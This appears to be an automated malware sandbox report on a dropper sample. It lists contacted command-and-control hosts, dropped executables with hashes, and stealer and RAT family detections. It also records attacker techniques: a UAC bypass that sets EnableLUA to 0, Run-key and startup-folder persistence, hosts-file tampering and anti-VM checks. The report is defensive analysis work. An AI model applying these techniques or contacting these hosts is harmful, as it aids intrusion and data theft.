US 8.8.8.8:53 api.ipify.org udp
KZ 37.151.156.118:40500 udp
US 104.26.12.205:443 api.ipify.org tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 118.156.151.37.in-addr.arpa udp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
FR 142.250.179.67:80 c.pki.goog tcp
US 8.8.8.8:53 67.179.250.142.in-addr.arpa udp
NL 149.154.167.99:443 t.me tcp
DE 18.192.31.30:15174 0.tcp.eu.ngrok.io tcp
SE 151.177.61.79:4782 tcp
GB 104.123.95.227:443 steamcommunity.com tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5sr.top udp
FI 95.217.25.228:443 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
IR 151.247.143.25:40500 udp
US 8.8.8.8:53 fivexc5pt.top udp
US 8.8.8.8:53 25.143.247.151.in-addr.arpa udp
US 192.210.150.26:8787 tcp
BG 87.120.125.214:443 tcp
DE 18.192.31.30:15174 0.tcp.eu.ngrok.io tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 fivexc5sr.top udp
UZ 83.222.7.85:40500 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:21405 tcp
UZ 87.237.234.159:40500 udp
BG 87.120.125.214:443 tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 159.234.237.87.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
PL 45.80.158.31:80 tcp
US 8.8.8.8:53 fivexc5sr.top udp
US 20.83.148.22:80 tcp
DE 18.192.31.30:15174 0.tcp.eu.ngrok.io tcp
SE 193.233.255.106:69 tcp
US 192.210.150.26:8787 tcp
RU 92.244.232.104:40500 udp
US 8.8.8.8:53 104.232.244.92.in-addr.arpa udp
US 20.83.148.22:80 tcp
GB 38.180.203.11:1010 tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 20.83.148.22:80 tcp
DE 18.192.31.30:15174 0.tcp.eu.ngrok.io tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5sr.top udp
VN 14.243.221.170:2654 tcp
RU 185.215.113.67:15206 tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 8.8.8.8:53 aukuqiksseyscgie.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 124.191.200.185.in-addr.arpa udp
US 192.210.150.26:8787 tcp
DE 18.192.31.30:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 fivexc5pt.top udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 fivexc5sr.top udp
YE 134.35.126.112:40500 udp
RU 185.215.113.36:80 185.215.113.36 tcp
US 8.8.8.8:53 112.126.35.134.in-addr.arpa udp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
SE 151.177.61.79:4782 tcp
DE 18.192.31.30:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 fivexc5sr.top udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 192.210.150.26:8787 tcp
IR 2.176.109.1:40500 udp
US 8.8.8.8:53 1.109.176.2.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
PL 45.80.158.31:80 tcp
DE 18.192.31.30:15174 0.tcp.eu.ngrok.io tcp
US 192.210.150.26:8787 tcp
YE 134.35.128.189:40500 tcp
US 8.8.8.8:53 fivexc5pt.top udp
RU 185.215.113.67:21405 tcp
IR 5.236.121.2:40500 udp

Files

memory/228-0-0x0000000074ECE000-0x0000000074ECF000-memory.dmp

memory/228-1-0x0000000000A00000-0x0000000000A08000-memory.dmp

memory/228-2-0x00000000053F0000-0x000000000548C000-memory.dmp

memory/228-3-0x0000000074EC0000-0x0000000075670000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe

MD5 6f154cc5f643cc4228adf17d1ff32d42
SHA1 10efef62da024189beb4cd451d3429439729675b
SHA256 bf901de5b54a593b3d90a2bcfdf0a963ba52381f542bf33299bdfcc3b5b2afff
SHA512 050fc8a9a852d87f22296be8fe4067d6fabefc2dec408da3684a0deb31983617e8ba42494d3dbe75207d0810dec7ae1238b17b23ed71668cc099a31e1f6539d1

memory/2456-15-0x00007FFD30E43000-0x00007FFD30E45000-memory.dmp

memory/2456-16-0x0000000000470000-0x0000000000794000-memory.dmp

memory/2456-17-0x00007FFD30E40000-0x00007FFD31901000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\02.08.2022.exe

MD5 30d1eeefad17c88e2eabe2bf8062a72d
SHA1 e4938bb238fae762bb2d6c18093df07536be918e
SHA256 7e5f9788995f6500e751aabfa04bcc4247dfee979124a1fae621326982a72af8
SHA512 2f0740cc007e354cd01d82ee93189575279fe0e192eec87c115fb9de2a9f272178785b7769484e08ffd43c2dc10eb770ebc5edaa53d40b8f69668cdf166918fb

memory/2456-32-0x00007FFD30E40000-0x00007FFD31901000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe

MD5 4cbc3c777f08cfbd14fc1ead80a5dd50
SHA1 dc94c1792a3ca2531dde570f9142c82c6336fadb
SHA256 115eb84390be11a5cbd396a9b950fcbe799e1684d0a6995ada7bca184fffba8f
SHA512 dee450b527956f9f22034984afdfd4c8c2a3e9933ad847c48bbe1873113b299814900137c98e8e25875230a649e8c46a77b5505729b3cd785c69b1df161a62b1

memory/4852-45-0x000000001C7C0000-0x000000001C810000-memory.dmp

memory/4852-46-0x000000001C8D0000-0x000000001C982000-memory.dmp

memory/228-47-0x0000000074ECE000-0x0000000074ECF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe

MD5 5b39766f490f17925defaee5de2f9861
SHA1 9c89f2951c255117eb3eebcd61dbecf019a4c186
SHA256 de615656d7f80b5e01bc6a604a780245ca0ccefd920a6e2f1439bf27c02b7b7a
SHA512 d216fa45c98e423f15c2b52f980fc1c439d365b9799e5063e6b09837b419d197ba68d52ea7facf469eae38e531f17bd19eaf25d170465dc41217ca6ab9eb30bf

C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe

MD5 71b3810a22e1b51e8b88cd63b5e23ba0
SHA1 7ac4ab80301dcabcc97ec68093ed775d148946de
SHA256 57bf3ab110dc44c56ed5a53b02b8c9ccc24054cf9c9a5aacc72f71a992138a3f
SHA512 85ddc05305902ed668981b2c33bab16f8e5a5d9db9ff1cee4d4a06c917075e7d59776bebfb3a3128ec4432db63f07c593af6f4907a5b75c9027f1bc9538612e8

memory/228-65-0x0000000074EC0000-0x0000000075670000-memory.dmp

memory/4312-68-0x00000250D3E70000-0x00000250D4300000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe

MD5 90d46387c86a7983ff0ef204c335060a
SHA1 2176e87fa4a005dd94cca750a344625e0c0fdfb0
SHA256 e463e04623e7348c515e0cc29320ff4e282c360a93b7a51f696639bd96a8bfb8
SHA512 654768e8a185ae338f255ecc3e512f6b89a984c44807c9153b17c4e4a7cc6b796536c563b1823ed84fbc20414f7a5ead7e9296d1f6cd03aa52b293075e9fcb7b

memory/4312-83-0x00000250EEB80000-0x00000250EED42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpE0AB.tmp

MD5 e4df78e5f6f81c5cc4de27b3aaf534a9
SHA1 47783b9211f8f657cd626ba1f842de361a2c88df
SHA256 83355ae6fdc4061ba74a34e82764623843b5659dbf6983ccc0deb846f52cb50d
SHA512 2c915c84f4e0dae2d8456bc03da8d19132f72d75e4aec1396e4e80edbbf3c191bd364afdda81a79bd0d7c2d54b1d6ba3267a14721699126d9f35388963f46ea1

C:\Users\Admin\AppData\Local\Temp\tmpE0EC.tmp

MD5 ba33d952d889399e6517b14767301890
SHA1 86971110b6ce7024809dc0ed1030c23c5512f921
SHA256 7f48dd0b2c4f9b7b2737dfb2e880144d44d9b97e9e29e68c2dec38de926a1657
SHA512 f7ccace1d2a119d6213fdc7b273f3bcb3bfdfff0b863d033834b9bdff809fab6a4a68ff004e535f0ecc684ad8b1f3d5c5b72b12b17b38e5b7834805d46b6237c

C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\84ef8e32cf3dd22e15e36759d999f0aa_cca0d105-8260-4611-8c12-bd85a7208b9f

MD5 0158fe9cead91d1b027b795984737614
SHA1 b41a11f909a7bdf1115088790a5680ac4e23031b
SHA256 513257326e783a862909a2a0f0941d6ff899c403e104fbd1dbc10443c41d9f9a
SHA512 c48a55cc7a92cefcefe5fb2382ccd8ef651fc8e0885e88a256cd2f5d83b824b7d910f755180b29eccb54d9361d6af82f9cc741bd7e6752122949b657da973676

C:\Users\Admin\AppData\Local\Temp\Files\test14.exe

MD5 f299d1d0700fc944d8db8e69beb06ddd
SHA1 902814ffd67308ba74d89b9cbb08716eec823ead
SHA256 b105f79e0eac7079fc2998949eee28fb0bf7f9a08c4912477031ac8d7e897406
SHA512 6821e6e9393cbd8471a0403052ac4d4df6e14dc0955deabd7709331dcf537f3076c08003001eab34788d53cf03fd61878a4b31aa7879f862627b28110f43e2ca

C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\D1A239B84C36C13862296195F1624FBD92295D3B

MD5 1c8213d032175ba4d71181f1c31ddab5
SHA1 f5519bdc4e45d4890b1e3e1638f2411066386c9d
SHA256 6fc69b79d68e1c61a561e22716ac1ec08f47bd0ee09fc70af2a73f99a495b3ce
SHA512 c9fc993f20e4a502baa22914c7d256b1fe7f1a01273bd71aff35efb148f4f780c3bc298bdf8507c5b04e645f4dc300576bb1d85a4cbe41c96b555bffe59bd2c3

memory/4560-138-0x0000000000180000-0x00000000001D4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe

MD5 91b5e8f0f941632476acdb56dd13c598
SHA1 34a051be4b40fa273deb322d3f6827138068e800
SHA256 1a7d261601e4bbc160e9b96db9320d6594665aa94a8827b2e749beadd89b7590
SHA512 7a10c304d120c71cd3b5b7e97414b3b8feb4aafc6a05a4e7d0914e1f69fdd9f717e36d063e8f0adc3d4192af69743e0c9778569bdcf8883d167f6fcb151cd3c6

memory/2180-150-0x0000000000930000-0x0000000000946000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\pp.exe

MD5 08dafe3bb2654c06ead4bb33fb793df8
SHA1 d1d93023f1085eed136c6d225d998abf2d5a5bf0
SHA256 fc16c0bf09002c93723b8ab13595db5845a50a1b6a133237ac2d148b0bb41700
SHA512 9cf2bd749a9ee6e093979bc0d3aacfba03ad6469c98ff3ef35ce5d1635a052e4068ac50431626f6ba8649361802f7fb2ffffb2b325e2795c54b7014180559c99

C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe

MD5 5fa4c8f61672a4cc9dd6a58e767d36fe
SHA1 ff0a211e3f6e7ad3abe3bdfb87daafa1c273def7
SHA256 fee35ed8a4d3b5a23b8fe7c153f3db5950a7d3f02b06bd0e2db149889717143f
SHA512 c0dd84684fba2a40e68193dbd1f0f7f57ff52cab092ca01cadd2f68c2fc53de8905278e8c2c3ec00ee68e5e6624c563d7f194f1403a4ec6e7bc7e94068a27ac9

memory/2532-170-0x00000237B1870000-0x00000237B1926000-memory.dmp

memory/2532-171-0x00000237CBE10000-0x00000237CBF1A000-memory.dmp

memory/2532-199-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-207-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-215-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-233-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-231-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-225-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-223-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-221-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-219-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-217-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-213-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-211-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-209-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-229-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-227-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-205-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-203-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-201-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-197-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-196-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-193-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-191-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-189-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-187-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-183-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-181-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-180-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-177-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-175-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-173-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-172-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-185-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2910514938.exe

MD5 0c883b1d66afce606d9830f48d69d74b
SHA1 fe431fe73a4749722496f19b3b3ca0b629b50131
SHA256 d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1
SHA512 c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5

memory/2532-4196-0x00000237B3490000-0x00000237B34DC000-memory.dmp

memory/2532-4195-0x00000237B36D0000-0x00000237B3726000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe

MD5 36a627b26fae167e6009b4950ff15805
SHA1 f3cb255ab3a524ee05c8bab7b4c01c202906b801
SHA256 a2389de50f83a11d6fe99639fc5c644f6d4dcea6834ecbf90a4ead3d5f36274a
SHA512 2133aba3e2a41475b2694c23a9532c238abab0cbae7771de83f9d14a8b2c0905d44b1ba0b1f7aae501052f4eba0b6c74018d66c3cbc8e8e3443158438a621094

C:\Users\Admin\AppData\Local\Temp\1989129625.exe

MD5 cb8420e681f68db1bad5ed24e7b22114
SHA1 416fc65d538d3622f5ca71c667a11df88a927c31
SHA256 5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea
SHA512 baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf

memory/5272-4216-0x00000000005C0000-0x00000000005C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2309417675.exe

MD5 96509ab828867d81c1693b614b22f41d
SHA1 c5f82005dbda43cedd86708cc5fc3635a781a67e
SHA256 a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744
SHA512 ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca

C:\Users\Admin\AppData\Local\Temp\Files\build555.exe

MD5 4e18e7b1280ebf97a945e68cda93ce33
SHA1 602ab8bb769fff3079705bf2d3b545fc08d07ee6
SHA256 30b84843ed02b74dfd6c280aa14001a724490379e9e9e32f5f61a86f8e24976d
SHA512 9612654887bdd17edba4f238efd327d86e9f2cd0410d6c7f15a125dacfc98bf573f4a480db2a415f328a403240f1b9adc275a7e790fd8521c53724f1f8825f37

C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe

MD5 d9694a6a1989d79aeded3f93cb97d24e
SHA1 a18019b9793029dac4d10e619ec85ea26909336a
SHA256 772c7a131d2a7a239ec39f32214eb94113aacd3984f572fb7e3b1fa1bec98f8c
SHA512 35a29c81d72f0e0bdb169c400dc90bf85859313c250824bf1fbbe362903c63f6a826e94994f8d86e8f56def5ce34cc71a45c6ff936e85fcfe8d169dbdb118168

C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe

MD5 c517ecc1d57af03affdd6945e1b618d8
SHA1 5c5174ebdf5902ada7c5899b6c0b98f2db363372
SHA256 9a32e0821da4466b858ecfd185f3d9bff232d8a3b44983988c248df05ef7c2ef
SHA512 355c1f39946662b0c16c6a5fa4c387aad03e1dc1c1dd74d650a784fc9e718b890a877937d8d3a26ab62a22385f03e02e6d0faa6d9e07ea3b16151c909596097a

memory/5308-4257-0x00000000004B0000-0x000000000067E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe

MD5 f5b150d54a0ba2d902974cbfd6249c56
SHA1 92e28c3d9ff4392eed379d816dda6939113830bd
SHA256 1ba41fb95f728823e54159eb05c34a545ddb09cb2d942b8d7b6de29537204a80
SHA512 57aade72ad0b45fdf1a6fdfa99e0d72165a9d3a77efd48c0fb5976ab605f6a395ab9817ea45f1f63994c772529b6b0c6448fa446d68c9859235ce43bf22cb688

memory/4228-4280-0x0000000000B00000-0x0000000000B84000-memory.dmp

memory/5216-4286-0x00000000004E0000-0x00000000006AE000-memory.dmp


Analysis: behavioral4

Detonation Overview

Submitted

2024-12-12 18:20

Reported

2024-12-12 18:25

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

273s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exse.zip"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exse.zip"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-12-12 18:20

Reported

2024-12-12 18:25

Platform

win10v2004-20241007-en

Max time kernel

161s

Max time network

301s

Command Line

winlogon.exe

Signatures

44Caliber

stealer 44caliber

44Caliber family

44caliber

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Discord RAT

stealer rootkit rat persistence discordrat

Discordrat family

discordrat

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RMS

trojan rat rms

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Rms family

rms

Stealc

stealer stealc

Stealc family

stealc

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 1384 created 1324 N/A N/A C:\Windows\System32\Wbem\wmic.exe

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Umbral

stealer umbral

Umbral family

umbral

Xworm

trojan rat xworm

Xworm family

xworm

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\XW.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\qwex.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
